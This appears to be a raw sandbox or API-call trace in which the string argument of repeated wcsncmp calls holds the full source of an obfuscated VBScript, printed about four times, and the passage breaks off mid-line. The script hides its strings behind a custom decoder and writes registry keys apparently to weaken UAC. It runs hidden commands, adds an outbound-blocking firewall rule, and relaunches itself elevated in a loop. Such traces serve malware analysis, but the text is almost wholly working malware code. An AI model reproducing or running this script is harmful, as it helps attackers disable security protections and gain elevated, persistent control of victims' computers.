bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.923] wcsncmp (_String1="Dim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.923] wcsncmp (_String1="im index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.923] wcsncmp (_String1="m index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.923] wcsncmp (_String1=" index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 